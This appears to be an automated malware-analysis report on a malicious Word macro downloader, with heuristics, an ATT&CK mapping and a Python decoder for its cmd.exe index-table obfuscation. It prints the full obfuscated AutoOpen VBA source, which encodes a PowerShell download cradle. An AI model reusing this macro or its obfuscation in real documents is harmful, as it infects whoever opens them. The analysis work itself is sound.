MALICIOUS
Risk Score: 144
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word (OLE) document whose VBA project contains an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. Almost every statement in the project is a no-op `TypeName ...` call on junk arithmetic, inserted to bury the few lines that matter, and `On Error Resume Next` swallows any error the junk raises. The live code is a single `Shell` call with window style 0 (hidden, written as `748164825 - 748164825`) on a string assembled from `KeyString(vbKeyC)` and the return values of a chain of helper functions; each helper rebuilds its fragment from short string-literal concatenations, and two of them use `Chr()` on an expression whose undeclared operands evaluate to 0, so it yields `Chr(34)`, a double quote. The fragments that survive inspection (`"md /V:ON/C"`, `"set # ="`, `"for %p in ("`, `"do set ~ =!~ !!# :~%p,1!"`, `"if %p geq 80 call"`) identify the command as cmd.exe with delayed variable expansion enabled, rebuilding its real payload by indexing into an embedded character table; the comma-separated number lists in the other helpers are those indices, which also puts T1059.003 (Windows Command Shell) in scope. Together with the AutoOpen trigger and the hidden-window Shell call, the structure is that of a downloader / initial-execution stager rather than a self-contained payload.
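A worked decode of the command the macro hands to Shell, added here as an analyst example; it is not part of the original report and not the analyzer's own code. It re-implements just enough VBA to evaluate the expressions this sample uses (string-literal concatenation, CStr(Chr(...)) with undeclared operands, KeyString(vbKeyC), and identifiers that resolve to helper-function results), then decodes the cmd.exe /V:ON index table. Its input is an excerpt copied from the macros.bas preview below: the AutoOpen Shell line and the first helper function, qkocjRXozk, with the remaining helpers omitted, so the reconstructed command is a prefix of the real one. Two assumptions are made and marked in the code: undeclared VBA names are Empty (the project has no Option Explicit), contributing "" to concatenation and 0 to arithmetic, and KeyString(vbKeyC) returns the letter C, written here as lowercase because cmd.exe is case-insensitive.

```python
import re

# Excerpt copied from the carved macros.bas preview on this page: the AutoOpen
# Shell line and the first helper function, qkocjRXozk, with a few of the decoy
# "TypeName ..." statements left in to show that the evaluator ignores them.
# The other helpers (SrLJcKU, jqfOKroKkj, ...) are omitted, so the reconstructed
# command is a prefix of the real one; feed the whole file to recover all of it.
MACRO_EXCERPT = r'''
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
End Sub
Function qkocjRXozk()
On Error Resume Next
TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M"
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
End Function
'''

# One concatenation operand at a time: "literal", CStr(Chr(a + b + 34 + c)),
# KeyString(vbKeyC), or a bare identifier. Operators and whitespace are skipped.
TOKEN = re.compile(r'"([^"]*)"|CStr\(Chr\(([^()]*)\)\)|KeyString\(vbKeyC\)|([A-Za-z_]\w*)')
ASSIGN = re.compile(r'^(\w+)\s*=\s*(.+)$')              # name = expr
SHELL = re.compile(r'^Shell@?\s+(.*),\s*[-+*/\d\s]+$')  # Shell <expr>, <windowstyle arithmetic>
CMD_TABLE = re.compile(r'set (?P<name>[^=]+)=(?P<table>.*?)&&for %\w+ in \((?P<indices>[0-9,\s]*)')


def eval_expr(expr, env):
    """Evaluate a '+' concatenation the way this macro relies on it. Assumption: names
    that are never assigned are Empty (no Option Explicit), i.e. "" when concatenated
    and 0 inside Chr(), which is why Chr(junk + 34 + junk) collapses to chr(34)."""
    out = []
    for m in TOKEN.finditer(expr):
        if m.group(1) is not None:            # "literal"
            out.append(m.group(1))
        elif m.group(2) is not None:          # CStr(Chr(...)): only the numeric terms survive
            out.append(chr(sum(int(n) for n in re.findall(r'\d+', m.group(2)))))
        elif m.group(3) is not None:          # identifier: local, helper result, or Empty
            out.append(env.get(m.group(3), ''))
        else:                                 # KeyString(vbKeyC): assumed to be the letter C
            out.append('c')
    return ''.join(out)


def reconstruct_shell_command(vba_source):
    """Walk the macro in file order. Every 'name = expr' goes into one flat environment
    (a VBA function returns by assigning to its own name, which is the last line of each
    helper), and the Shell argument is evaluated only at the end, once every helper
    result exists. TypeName junk, Sub/Function headers and Attribute lines never match."""
    env, shell_expr = {}, None
    for raw in vba_source.splitlines():
        line = raw.strip()
        sm = SHELL.match(line)
        if sm:
            shell_expr = sm.group(1)
            continue
        am = ASSIGN.match(line)
        if am:
            env[am.group(1)] = eval_expr(am.group(2), env)
    return eval_expr(shell_expr, env) if shell_expr else None


def decode_v_on_indexer(command, terminator=None):
    """Decode the cmd.exe /V:ON index-table scheme: 'set <name>=<table>' stores a lookup
    string and 'for %p in (i1,i2,...) do set ~=!~!!<name>:~%p,1!' appends table[i] per
    index. An index at or past the end of the table (this sample tests 'if %p geq 80')
    expands to nothing and doubles as the end marker. Returns (table, decoded_text)."""
    m = CMD_TABLE.search(command)
    if not m:
        raise ValueError('no /V:ON index table found in command')
    table = m.group('table')
    limit = len(table) if terminator is None else min(terminator, len(table))
    decoded = []
    for tok in m.group('indices').split(','):
        tok = tok.strip()
        if not tok:                           # trailing comma of a truncated list
            continue
        i = int(tok)
        if i >= limit:
            break
        decoded.append(table[i])
    return table, ''.join(decoded)


if __name__ == '__main__':
    cmd = reconstruct_shell_command(MACRO_EXCERPT)
    table, text = decode_v_on_indexer(cmd)
    print('command :', cmd)
    print('table   :', repr(table), '(%d chars)' % len(table))
    print('decoded :', text)
```

Running the block prints the reconstructed `cmd /V:ON/C"set ...` command, the 74-character lookup table and the decoded text. The first helper's indices alone decode to `powershell $pKz=new-object Net.WebCli`, the opening of a PowerShell Net.WebClient download cradle, which confirms the downloader assessment above; the later helpers carry the rest of the index list (including the URL the cradle fetches) and the `if %p geq 80 call` terminator, so running the evaluator over the complete carved macros.bas yields the whole command. Decode the reconstructed command; do not execute it.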
Heuristics (6)

- ClamAV: Doc.Malware.Generic-6666973-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6666973-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The rule text assumes that no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample a VBA project was recovered (see OLE_VBA_MACROS and OLE_VBA_AUTOOPEN above), so the finding is redundant with the AutoOpen detection rather than independent evidence. It is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI that ordinary Office files carry; it is not an indicator and is never contacted by the document.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12762 bytes |

SHA-256: c4e9bd6a3c9933d80d57061c39aeed6fe5a842967e01ced1a8f2af9b21adcd09

Detection (macros.bas)

ClamAV: No threats found. The Doc.Malware.Generic signature above matched the document container, not this carved VBA text, so the absence of a hit here does not weaken the verdict.

Obfuscation or payload: likely. 132 of 214 identifiers look randomly generated (e.g. 'hNfIrziVNvNEYQ'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "VXzoOtZVpkqYRd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(211519271)
TypeName 95
TypeName dwcBFA
TypeName Atn(PRhtji - pzwJz * 87460 - zFlLNk)
TypeName PrhbH
Shell@ KeyString(vbKeyC) + JQjiYpwTYJh + wADEWZn + qkocjRXozk + SrLJcKU + jqfOKroKkj + UVMStnSwnuS + cXoQHhaw + XfuLUTYcN + qjOpKzfk + khOUbITmDB + SwAEVG + hNfIrziVNvNEYQ + SRmwQuwFmolR, 748164825 - 748164825
TypeName Oct(7415 + wBbjOc)
TypeName Hex(820)
End Sub
Attribute VB_Name = "HqzoUYE"
Function qkocjRXozk()
On Error Resume Next
TypeName 8
TypeName 5
TypeName CBool(uUwTP / BCNfj + IjllC * Jtdss)
pMjuPE = "md" + " /" + "V" + ":" + "ON" + "/" + "C" + CStr(Chr(HkvQaIqZq + jJuaHnM + 34 + OkbwZzio + optdlER)) + "s"
TypeName 952
TypeName 177591525
iDYaVqOhNV = "e" + "t #" + " " + " =" + "wjt" + "h" + "MMi" + "M"
TypeName Sqr(115314270)
TypeName Sqr(ciqCu)
jtChbj = "Ur" + "v" + "GUs" + "Cvw" + "HW" + "NTV" + "r" + "p=" + "/" + "xo" + "au-" + "b"
TypeName TFrDZY
TypeName Log(2157)
TypeName 72
YPNfmVUj = "lS9" + "P:)" + "(7" + "n" + "6y}"
TypeName 255
TypeName Atn(9305)
TypeName Rnd(MmikC)
sGYKrBwj = "B;e" + "Fz3" + "1," + "d" + "{Xk"
TypeName CLng(NEQiD)
TypeName Cos(86757 / Coilz)
TypeName Hex(81161 - mpTMsw / GsKWE * KZtrF)
ItdcqrhcmO = "gc" + "Y$D" + "m" + " '\" + "IKf"
TypeName qwOUw
TypeName CSng(MRbjP)
TypeName Oct(NIwAIq)
IMqDsNdUS = ".q" + "@E" + "+" + "R&" + "&fo" + "r " + "%p" + " in" + " ("
TypeName CBool(96112 - ZWZXr + 56737 / CMPwwB)
TypeName blzDiW
UsqaiVMp = "2" + "3," + "2" + "7,1" + "6," + "46," + "22," + "13" + ",3," + "4" + "6" + ",3"
TypeName Atn(67)
TypeName CStr(MktFL)
TypeName Rnd(8)
BKfcBXj = "2" + ",32" + ",62" + ",59" + ",2" + "3," + "6" + "6,4" + "8,2" + "4,4"
TypeName 7
TypeName 77
TypeName 17
tBfKuqqDVpC = "0," + "46" + "," + "16," + "3" + "0,2"
TypeName Chr(pRVWF / SpiZiZ)
TypeName TFQzX
TypeName mzsLz
zrCEtPV = "7" + ",31" + ",1" + ",4" + "6,5" + "7"
TypeName 54
TypeName Sqr(qjLKrw - jEkAnW - 38042 - iGwQl)
TypeName CSng(36877 - ADhIXl / 45669 + ZJapLv)
psNkbziiCi = "," + "2," + "62" + "," + "1" + "9" + ",46" + ",2," + "6" + "8" + ",18" + "," + "4"
TypeName CLng(VuYDvS + 48933 + FCXNT + MSJnO)
TypeName 66
TypeName CSng(460072517)
PnfWlL = "6," + "3" + "1," + "14" + "," + "3" + "2" + ",6" + ","
qkocjRXozk = pMjuPE + iDYaVqOhNV + jtChbj + YPNfmVUj + sGYKrBwj + ItdcqrhcmO + IMqDsNdUS + UsqaiVMp + BKfcBXj + tBfKuqqDVpC + zrCEtPV + psNkbziiCi + PnfWlL
TypeName Cos(19996 / tmOFZ * zIPjN - UNMpLc)
TypeName Rnd(PNNti)
TypeName 423450039
End Function
Function SrLJcKU()
On Error Resume Next
TypeName CStr(pChJp)
TypeName 1059
TypeName qmusd
vznVCcFb = "46," + "40," + "2," + "45," + "59," + "21," + "71"
TypeName Rnd(78)
TypeName Round(18040 * zMfzwu)
TypeName 9
HQuHjnR = ",67" + ",24" + ",6" + "3," + "3" + ",2," + "2," + "23" + ","
TypeName Round(971)
TypeName Sin(iGiYL / VYDrKH / 51611 - sblcjm)
ljZzjDHRc = "3" + "6,2" + "5,2" + "5" + ",28" + "," + "61"
TypeName Sqr(64405 / FfGwoF)
TypeName Round(ZTISvQ + HoJrkI)
JfrXu = ",46" + ",5" + "2,6" + ",27" + ",4"
TypeName APSOm
TypeName Rnd(201076278)
TypeName 525
JmKwkvO = "0," + "6" + "8" + ",4" + "0," + "4" + "6,2" + ",25" + ",29" + ",1" + "9"
TypeName Chr(117133175)
TypeName CByte(siCdmB / SRzIT + 28011 / sjFvsE)
NBHoJQOXV = "," + "7" + "," + "12" + "," + "49," + "34," + "44"
TypeName Cos(59)
TypeName cPaoa
wDAGGP = ",70" + "," + "3" + ",2," + "2," + "23" + ",3" + "6" + ",25"
TypeName 202309463
TypeName Sqr(YpNCC)
TypeName 1
jLcazYaNlpm = "," + "25," + "3" + "1" + "," + "6,5" + "7,"
TypeName kZjddf
TypeName CLng(KwzmUa)
TypeName CDbl(XbOsu)
RtUVbJWOdT = "6," + "57" + "," + "29," + "32," + "2,2" + "9,2" + "2," + "28," + "31," + "57,"
TypeName hanNc
TypeName CBool(pFfiCc)
TypeName Round(586)
wdowEU = "4" + "0," + "68," + "5" + "7" + ",27" + "," + "61," + "25" + "," + "4" + "1,1" + "3"
SrLJcKU = vznVCcFb + HQuHjnR + ljZzjDHRc + JfrXu + JmKwkvO + NBHoJQOXV + wDAGGP + jLcazYaNlpm + RtUVbJWOdT + wdowEU
TypeName Rnd(7763)
TypeName Oct(patquL)
End Function
Function jqfOKroKkj()
On Error Resume Next
TypeName WutWJ
TypeName 335
jMmupz = ",34" + ",39" + ",1," + "58" + ",48" + "," + "2" + "8,7"
TypeName 3944
TypeName Atn(436225468)
TypeName 940
JaIQcjwri = "0" + ",3," + "2" + ",2," + "23," + "36," + "25," + "2"
TypeName wmhREY
TypeName Tan(15997 * NwCriY / VAzENw / vtzTB)
TypeName CByte(298013308)
bOFKjU = "5," + "15," + "2" + "8," + "32" + ",4" + "6," + "40,"
TypeName RSdwI
TypeName Hex(293095284)
TypeName 8
IdouPRCDPUS = "4" + "6," + "2" + "," + "6," + "40" + ",2"
TypeName ChrB(96149 - vpIMw)
TypeName 149
nCbMbos = "," + "46" + ",22" + ",40" + "," + "46," + "2"
TypeName Fix(kdcvQJ)
TypeName Atn(ZzMiiL)
TypeName dbwkHm
DHwjkFiKnnA = ",6" + "8," + "57" + ",27" + ",61" + ",68" + ",3" + "1," + "22"
jqfOKroKkj = jMmupz + JaIQcjwri + bOFKjU + IdouPRCDPUS + nCbMbos + DHwjkFiKnnA
TypeName Round(arsJrZ / UUEhpW / 24776 * nPHdqT)
TypeName 647
TypeName CSng(MjXEkq / FzOqSd)
End Function
Function UVMStnSwnuS()
On Error Resume Next
TypeName Int(6)
TypeName Log(JNGLGG)
IkpCjZ = ",25" + "," + "49" + "," + "73" + "," + "5" + "2,"
TypeName 160626531
TypeName CLng(iumNmH + wHCbji / cpHWX + wYDJJ)
TypeName Fix(kFcJwn + 95604 - KMBEK + UaYFZi)
SWTJq = "2," + "1" + "5,7" + "0," + "3," + "2" + "," + "2," + "23," + "36" + ",25" + ","
TypeName Round(31991 * sjntGr + 55381 - LdMrf)
TypeName 49
TypeName 6998
VqhFzJv = "25," + "56," + "27," + "13" + "," + "3"
TypeName Round(RcGRMc / 58182 + fEksdA / dROADN)
TypeName zsjVdv
TypeName 81
IIpGN = ",2" + "7" + ",1" + "6," + "57,"
TypeName NRnsa
TypeName PIMYT
azlTYci = "28" + ",2" + "2" + ",6" + "8,5" + "7,2" + "7" + "," + "61,"
TypeName Rnd(BCbOw * ZzsJZf)
TypeName 155
TIIfTzWc = "25" + "," + "34" + ",73" + ",21"
TypeName CInt(99808 + HqPiBl)
TypeName CBool(poEFLi)
buzXUi = ",69" + "," + "28" + ",5" + "4," + "7" + "0," + "3,2" + ","
TypeName Oct(bsDNh)
TypeName SuiArD
IqMUhd = "2," + "23," + "36" + "," + "2" + "5" + ",25" + "," + "1" + "6" + ",3"
TypeName 3113
TypeName CBool(MclcAR)
TypeName Fix(43970 / pUthf / zzZKw * 27125)
FbtJYkA = ",4" + "6,4" + "6" + ",3" + "2," + "31," + "28" + ",3" + "2" + ",28" + ",40"
TypeName Int(vQimKJ * tOuWU * VARND / RwidX)
TypeName Sgn(QGCqAm - ztPSw + jabTra - TYNDAr)
TypeName ChrB(IstzpJ)
rjlBvMzCnw = ",5" + "7,4" + "6,2" + "," + "22," + "2" + "8," + "6" + ",4" + "0" + ",6," + "40" + ",56"
TypeName hfllUh
TypeName 74
nnNdwowqNUK = ",6" + "8" + ",57" + "," + "27,"
TypeName TzXvp
TypeName 3794
TypeName npNnLm
RWMWXFu = "6" + "1" + "," + "25" + ",3" + "4" + "," + "6"
UVMStnSwnuS = IkpCjZ + SWTJq + VqhFzJv + IIpGN + azlTYci + TIIfTzWc + buzXUi + IqMUhd + FbtJYkA + rjlBvMzCnw + nnNdwowqNUK + RWMWXFu
TypeName 7381
TypeName Hex(APFNo + RYkhRS)
End Function
Function cXoQHhaw()
On Error Resume Next
TypeName Round(501543854)
TypeName 8371
GWLHEIizi = ",32" + "," + "63," + "68" + "," + "33" + ","
TypeName Sgn(UzJrV)
TypeName 898
TypeName Rnd(qoVtKk / hzTHRo + 60897 + KIfUqY)
UzhjbafnA = "23," + "3" + "2," + "6" + "," + "2," + "38,"
TypeName Int(25551 * vkbjOo - 13413 / zkYkub)
TypeName sKpzC
TypeName Sgn(100467305)
ofjQQQOvKu = "63," + "70," + "63" + "," + "37," + "45" + ",5"
TypeName AzuAi
TypeName AMBCWw
TypeName Sin(11905 / WEEQv)
ERObww = "9" + "," + "6" + ",6" + "5," + "54,"
TypeName ChrW(2284)
TypeName 503764122
TypeName Atn(TwORiK + QFAqsN * dCnHmz * hiiFX)
wKAtUf = "62" + ",2" + "4" + ",6" + "2," + "63," + "50,"
cXoQHhaw = GWLHEIizi + UzhjbafnA + ofjQQQOvKu + ERObww + wKAtUf
TypeName Hex(jnOJif - wjRkV + lFZdq / mtjRzv)
TypeName Tan(TjLKjZ)
End Function
Function XfuLUTYcN()
On Error Resume Next
TypeName 2365
TypeName jfwVDE
TypeName CInt(4750 / qwZEbh)
WZomVXIQM = "4" + "1" + ",3" + "4,6" + "3" + "," + "4"
TypeName zWOOzt
TypeName ChrB(3459)
ufjWQWwjMmP = "5,5" + "9" + ",6" + "5," + "35,"
TypeName CLng(559)
TypeName Tan(425541703)
ktmOOiMPlX = "2," + "24" + ",5" + "9," + "46," + "4" + "0"
TypeName CLng(470)
TypeName swuLf
zWRLciNa = ",15" + ",36" + ",2," + "46," + "61," + "2" + "3," + "72,"
TypeName 1
TypeName CLng(zTspui)
TypeName kHcaqN
wLRRT = "63," + "6" + "4" + "," + "63," + "7" + "2," + "59" + ",6" + ",6" + "5,5"
TypeName CByte(5890 - njjBfB + jGhVTB * WvQuH)
TypeName kncPoM
TypeName Atn(113459832)
CfmOizoh = "4" + ",72" + "," + "63" + ",68" + ",46" + ",2" + "6," + "4" + "6," + "63,"
TypeName 76
TypeName Round(cjCvrv)
TypeName ENYDHR
MACwzMubmjV = "4" + "5," + "67" + "," + "2" + "7" + "," + "2" + "2,4" + "6,2" + "8,"
TypeName ChrB(vwbYz)
TypeName 7506
jSDRv = "57" + "," + "3," + "3" + "8" + ",5" + "9,6"
TypeName CDate(13954 * qoAiVI)
TypeName Sgn(RDaDVF)
vLsKHn = "6,1" + "6,4" + "7" + ",62" + ",6," + "40," + "62" + ",5" + "9" + "," + "2" + "1" + ",7"
TypeName Cos(92)
TypeName 8
cvtcFtMREYI = "1" + "," + "67," + "3" + "7," + "53," + "2,"
XfuLUTYcN = WZomVXIQM + ufjWQWwjMmP + ktmOOiMPlX + zWRLciNa + wLRRT + CfmOizoh + MACwzMubmjV + jSDRv + vLsKHn + cvtcFtMREYI
TypeName ChrW(wiqjG / zHdwAC * 69575 - zCEiC)
TypeName CInt(7)
End Function
Function qjOpKzfk()
On Error Resume Next
TypeName Tan(SdrbVI)
TypeName Atn(12074 - JmnIzT + hKjNV * YTLHO)
TypeName Round(KpDYtX)
zErFpEHNzm = "22," + "42" + ",5" + "3" + ",5" + "9,2" + "3,6" + "6," + "48," + "68," + "60," + "27"
TypeName CLng(4206)
TypeName 8721
TypeName 2
bbYrA = "," + "16," + "40" + ",32" + ",27" + "," + "28" + ",5" + "2,4" + "7,6" + ",32" + ","
TypeName CInt(JtzWpE)
TypeName Sin(19946 - kiMTP)
pFidUzqiCil = "4" + "6,3" + "8," + "5" + "9" + ",6" + "6," + "16" + ",4" + "7" + "," + "5"
TypeName 650
TypeName Chr(uEHfU - OOaRIT)
TypeName Log(1)
ACGczQvXE = "1," + "62," + "59" + "," + "6" + "5,3" + "5,"
TypeName 204696817
TypeName 613
TypeName VoSJKo
iVHtPzJzJz = "2" + "," + "37" + "," + "45" + ",33" + ",2" + "," + "2" + "8" + ","
TypeName ChrW(71)
TypeName CSng(aIwrw)
HQfzDII = "22" + ",2," + "30," + "3" + "5" + ",22" + ",2"
TypeName iiZPI
TypeName 9
TypeName Log(BBCwb)
VkXrHzSB = "7," + "57" + ",4" + "6," + "1"
qjOpKzfk = zErFpEHNzm + bbYrA + pFidUzqiCil + ACGczQvXE + iVHtPzJzJz + HQfzDII + VkXrHzSB
TypeName 332
TypeName 34
End Function
Function khOUbITmDB()
On Error Resume Next
TypeName Tan(91992 * uTqPNC)
TypeName Cos(URWTf)
HrzQaAilk = "3,1" + "3,6" + "2,5" + "9," + "6"
TypeName FGfrf
TypeName Log(3)
TypeName CLng(76565 + WklmW)
IrHCBqwVrn = "5,3" + "5,2" + ",4" + "5," + "3" + "1," + "22" + ",46" + ",2" + "8," + "55,"
TypeName 3958
TypeName 838
TypeName Sqr(35778 - iPoJB)
okWFA = "45" + ",43" + "," + "57" + ",2" + "8" + ",2," + "5" + "7" + "," + "3,5" + "3,"
TypeName EECjCN
TypeName jTPrHU
TypeName CSng(200)
FQAHhsAMw = "43" + ",4" + "3," + "62," + "62" + "," + "62," + "6" + "2,6" + "2"
TypeName Chr(FZETtB - SDUti + 2166 + 87165)
TypeName CInt(61105 + cCAKhh)
TypeName ChrB(83804423)
pzciBzdD = "," + "62" + "," + "62" + ",62" + "," + "62" + "," + "6" + "2," + "62" + ",6" + "2"
TypeName 4
TypeName Log(jzIciI / KjYqWz)
TypeName bilwJ
zDMlPIj = ",62" + ",6" + "2" + ",62" + ",62" + "," + "62" + ","
TypeName GzpAvl
TypeName Int(nzIAzi + 57548)
TypeName CBool(75)
FDaHuUw = "8" + "0)d" + "o " + "set" + " " + "~ " + " =" + "!~ " + " " + "!!#" + " "
TypeName CStr(CBOfSD + AVqafC)
TypeName Atn(thjunj)
qOWOoIrDAzW = " :~" + "%" + "p," + "1!" + "&" + "&if" + " %" + "p " + "geq" + " 80" + " ca" + "ll" + " "
khOUbITmDB = HrzQaAilk + IrHCBqwVrn + okWFA + FQAHhsAMw + pzciBzdD + zDMlPIj + FDaHuUw + qOWOoIrDAzW
TypeName CBool(5)
TypeName Int(bKqYv - izPlML)
TypeName CBool(1834)
End Function
Function SwAEVG()
On Error Resume Next
TypeName CInt(462178316)
TypeName 6067
XEkwBX = "%" + "~ " + " " + ":" + "*~"
TypeName YIDHQ
TypeName Sgn(uHqTin)
TypeName CDate(YPnwzz)
FKudlhzwH = " " + " !" + "=" + "%" + CStr(Chr(pVGqKtUwQDblUJ + XJzqbaC + 34 + wOnfIWpzRqnHt + FARlsQU)) + " " + " "
SwAEVG = XEkwBX + FKudlhzwH
TypeName 252469504
TypeName Atn(jocjB)
TypeName 6
End Function